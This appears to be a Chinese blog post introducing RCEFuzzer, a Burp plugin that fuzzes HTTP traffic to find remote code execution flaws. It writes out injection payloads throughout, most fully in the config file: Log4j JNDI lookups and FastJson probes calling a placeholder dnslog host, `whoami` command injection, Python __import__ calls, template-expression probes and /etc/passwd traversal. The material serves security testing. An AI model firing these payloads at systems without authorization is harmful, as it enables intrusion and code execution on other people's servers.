RCEFuzzer - 被动扫描与fuzz上一些思路的实现

RCEFuzzer - 被动扫描与fuzz上一些思路的实现
写在前面1. 这是大概三年前的版本，基本已经停止维护，除非严重 Bug 外不考虑更新。2. 这个版本是以 Burp 插件的形式存在，新版本是独立的系统，仅在 JJ Team 开放使用。3. 仅开放 R 2023-12-25 23:3:18 Author: 赛博少女(查看原文) 阅读量:17 收藏

写在前面

1. 这是大概三年前的版本，基本已经停止维护，除非严重 Bug 外不考虑更新。

2. 这个版本是以 Burp 插件的形式存在，新版本是独立的系统，仅在 JJ Team 开放使用。

3. 仅开放 Release 版本作为交流学习使用， jar 没做混淆，实际上和放代码差别不大，作为交流学习使用我认为足够了，拿着源代码做细微调整意义不大，研究学习建议重构。

4. 欢迎交流学习～

工具地址

https://github.com/TheKingOfDuck/RCEFuzzer

基础介绍

这是一个以 fuzz 为中心思想的被动扫描工具，多数扫描器的工作逻辑是以已知漏洞去冲目标，然后根据条件判断是否存在这个已知的漏洞；RCEFuzzer 的工作逻辑是以通用 payload 去污染目标的参数，然后根据条件判断是否存在未知漏洞。

举个例子，假设被动收集到的流量是：

POST /sys/customer/list HTTP/1.1Host: www.baidu.comContent-Length: 23Content-Type: application/json;charset=UTF-8
{"key1":"value1","key2":"eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9","id":1,"isLogin":false,"key3":{"innerkey2":"{\"k3\":\"v3\"}"}}

如果配置了三条通用的 payload ：

${jndi:ldap://dnslog/log4j}`whoami`.dnslog{"@type":"java.net.Inet4Address","val":"dnslog"}

那么 RCEFuzzer 的参数污染模块将对目标发起以下请求：

污染 key1 的值然后分别发包
污染 key2 的值然后分别发包
尝试自动解码 key2 ，并污染子 JSON 的 innerkey1 的值然后分别发包
污染 key3 的值然后分别发包。
污染 key3 的子 JSON 的 innerkey2 的值，然后分别发包。
尝试解析 innerkey2 ，并污染子JSON的 k3 的值然后分别发包

理论上总的请求量是 3*6=18 次。这仅是参数污染模块，如果带上其他模块，那请求量可能是 50 。如果 payload 写得多点，原流量大一点，那么可能是 5000 次。

流量过大注定他没法在常规日站的场景使用，给目标写入一堆脏数据，那就得不偿失了。

对自己日常自己跑起来要挖洞的系统，测试类环境的系统就无所谓。

资产去重

上面提到流量会非常大，选出需要污染的流量就尤为重要，降低扫描基数，扫描流量也将大幅下降，那么在这个方向上我做了哪些尝试呢：重点参考

https://blog.thekingofduck.com/post/url-normalize-in-passive-scan/

除最基本的静态资源去重外，这里面还提到了关于 urlpath 、 query 等的处理的思路，但是不够完全，细心一点的会发现上文中提到的流量：

{"key1":"value1","key2":"eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9","id":1,"isLogin":false,"key3":{"innerkey2":"{\"k3\":\"v3\"}"}}

这里面的 id 和 isLogin 是没有污染的，因为大部分后端语言都会定义好参数类型，对于整数型、布尔型的参数没有太大污染的必要，徒增报错罢了，除此之外流量中常见 uuid 、hash 等常见格式的值也会跳过污染，进一步缩减流量。

这里需要单独再提一下，实践中有很多确认是重复的，比如：

/order/S09834FVD/order/S07C34FDCCVX

显然两条流量对应了同一后端，是重复的，没必要都扫，但他没有像 uuid 或 md5 一样的固定特征，正则没法解决，看到一些同行的解决方案是上大模型去识别，颇有种工作饱和了没事干的感觉，本质上是区分文本是否为随机的，即将文本分为是否随机两种类型，业界有非常多成熟的文本分类模型训练教程，现成的模型，不用 GPU 就可以快速解决问题。

扫描模块

开放的版本中功能覆盖的有限，仅简单介绍一些思路。核心逻辑是递归追加/替换污染，对嵌套的 from-data 、json 、xml 、soap 等进行自动解码、污染、再编码。

JSON 污染

对 JSON 污染我个人理解分为以下两类：

键值污染：对于字符串类型的键值进行增加或替换的污染，除了污染成正常的资产 payload 之外，还可污染成 python 的结构体。
替换污染：对整个 JSON 进行替换，换成指定的 payload ，这里主要针对 FastJson 这样的漏洞。

具体一点的例子：

{"innerkey1":"innervalue1"}

可以污染成：

{"innerkey1":__import__('socket').gethostbyaddr('dnslog')} {"innerkey1":"${jndi:ldap://dnslog/jsonkey}"} {"innerkey1":"innervalue1","@type":"java.net.Inet4Address","val":"dnslog"} {"innerkey1":{"@type":"java.net.Inet4Address","val":"dnslog"}} {"@type":"java.net.Inet4Address","val":"dnslog"}

几种漏洞类型都挺常见的。

header 污染

和JSON污染一样：

键值污染：对 header 键值进行增加或替换的污染。
替换污染：对所有 header 的键值污染成指定 payload 。

举个例子：

GET / HTTP/1.1Host: www.baidu.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36Connection: closeCache-Control: max-age=0

可以污染成

GET / HTTP/1.1Host: www.baidu.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: ${jndi:ldap://dnslog/jsonkey}Connection: closeCache-Control: max-age=0X-Forwarded-For: `whoami`.dnslogX-Api-Version: ${jndi:dns://dnslog/456}

像 Host 、Connection 、Content-Type 这类 header 应该跳过污染，避免对请求本身造成影响，一次性替换全部 header 的键值这种纯粹是为了 log4j 这种 payload 打过去省事，暴力出奇迹。

参数污染

JSON 场景下一般就嵌套下转义后或编码后的 JSON ，但 form-data 表单中有非常多出现嵌套其他类型数据的情况，比如参数中嵌套 JSON ，嵌套 XML ，从某些 OA 中能够看出研发为了兼容做的不少 🐂 事。

同样分为两种模式：

替换污染：常规的命令注入、SQL 注入等等
追加污染：后端带判断类的，如校验传入值包含指定字符串时，追加模式将会非常管用。

还是举个例子：

https://www.baidu.com/admin/load?host=127.0.0.1&config=eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9

可以污染成：

https://www.baidu.com/admin/load?host=dnslog&config=eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9https://www.baidu.com/admin/load?host=127.0.0.1@dnslog&config=eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9https://www.baidu.com/admin/load?host=127.0.0.1&config=eyJpbm5lcmtleTEiOiJgd2hvYW1pYC5kbnNsb2cifQ==...

为什么要做追加模式在第二个 case 中就可以看出。

SSRF

代码抄自：

https://github.com/ethicalhackingplayground/ssrf-king

作者基本覆盖了常见代码产生的 SSRF 和配置错误导致的 SSRF ，非常受用。这里只是封装了嵌套解析，其他改动不大。

其他模块

还有很多了其他模块，如响应匹配、文件上传污染、SOAP 请求污染等，但并未在该版本中实现，不再一一介绍。

使用技巧

需要有配套的dnslog：

https://admin.xxxx.com/logs?token=xxxxxx&type=dns&q=KEYhttps://admin.xxxx.com/logs?token=xxxxxx&type=http&q=KEY

KEY 是占位符，不能改动其他无所谓。

配置文件如下：

##### 配置说明:#    1.tweb的配置是必须要改的, 不改显示不了漏洞#    2.白名单的优先级是高于黑名单的#    3.所有配置都是可以动态改的, 不用重新加载插件# 使用说明:#    https://www.wolai.com/gS5UWgMmHG4ynJQgzL3AYk###config:  version: |  # 插件版本    0.5  twebdomain: | # tweb 子域名配置    xxx.xx.com  twebapi: |  # tweb api配置 其中KEY为展位符,在新旧版本的tweb均可在Profile页面找到    https://admin.xxxx.com/logs?token=xxxxxx&type=dns&q=KEY  timeout: |  # 扫描过程中的超时配置 非tweb请求超时设置 单位毫秒 60000为60秒    60000  hostBlacklistReg: |  # 禁止扫描的域名列表    (.+?)(gov\.cn|edu\.cn|tweb|google|gstatic)(.+?)  extBlacklist: |  # 禁止扫描的后缀列表,这不是正则，本来想从passive-scan-client中抄代码的,结果发现他有bug...    .js|.css|.jpeg|.gif|.jpg|.png|.pdf|.rar|.zip|.docx|.doc|.ico
jsonPollution:  status:  #on为开启 off为关闭    on  allin: | #替换整个json数据包    {"@type":"java.net.Inet4Address","val":"dnslog"}  value: | #仅污染json的键值 为了python eval那种情况考虑 不加双引号包裹的话污染结果类似{"test":__import__('os')} {"test":"{\"dtaa\":__import__('os')}"}    "${jndi:ldap://dnslog/jsonkey}"    __import__('socket').gethostbyaddr('dnslog')
paramPollution:  status: #on为开启 off为关闭    on  exprs: | #为了兼容有回显的表达式注入/代码执行漏洞    {{9527*2333}}|22226491    ${T(java.lang.System).getenv()}|JAVA_HOME    ${T+++++++(java.lang.System).getenv()}|JAVA_HOME    {php}var_dump(md5(9527));{/php}|52569c045dc348f12dfc4c85000ad832    {if+var_dump(md5(9527))}{/if}|52569c045dc348f12dfc4c85000ad832    ../../../../../../../../../../../../../../../etc/passwd|root  value: |    dnslog    ${jndi:ldap://paramPollution.dnslog/log4j}    `whoami`.dnslog    http://dnslog/    ping+-nc+1+dnslog
headerPollution:  status: #on为开启 off为关闭    on  allin: | #一次性污染除了url和host外的所有请求头    ${jndi:dns://dnslog/456}    ${jndi:ldap://dnslog/789}  headers: | #添加的请求头如果原数据包有则追加原值污染 无则添加后再发包 竖线|为key和value的分隔符号。    X-Forwarded-For|${jndi:dns://dnslog/456}    X-Api-Version|${jndi:dns://dnslog/456}
ssrfPollution:  status: #on为开启 off为关闭    on
responseMatch:  status: #on为开启 off为关闭    off  expr: | #添加的请求头如果原数据包有则覆盖原值污染 无则添加后再发包    thinkphp:error

参数污染中 exprs 部分的配置以 | 作为切割，区分请求和响应，用于回显漏洞的检测。tweb 处配置 dnslog 的子域名和 api 查询的 url 即可。

写在最后

RCEFuzzer 在实践中直接或间接的为我贡献了几十个的 RCE ，不少系统通过点点就可轻易收割漏洞点，进而撕开口子，拿到代码，进一步审计得到更有价值的洞，是生产漏洞的重要一环，也希望能为各位贡献新的RCE！

最后的最后，特别要提的是 RCEFuzzer 中不少思路都来源于 c26root （即大 6 老师）的指点，大 6 老师才是真正的神，大 6 老师🐮🍺！

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247486853&idx=1&sn=61a25af1b8664beb93d01d7496cbd511&chksm=c16fc355d41b2827663cbc104cfee76d079aad0ee1f743659022f483b1d0df82ef201456ab68&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh